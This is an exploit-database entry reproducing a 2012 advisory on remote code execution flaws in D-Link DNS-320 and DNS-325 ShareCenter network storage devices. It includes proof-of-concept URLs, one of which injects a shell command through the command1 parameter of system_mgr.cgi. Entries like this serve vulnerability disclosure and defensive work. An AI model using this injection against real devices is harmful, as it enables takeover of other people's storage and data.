D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities

EDB-ID:

36670

CVE:

N/A




Platform:

Hardware

Date:

2012-02-08


source: https://www.securityfocus.com/bid/51918/info

D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.

Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.

The following products are affected:

D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter 

http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml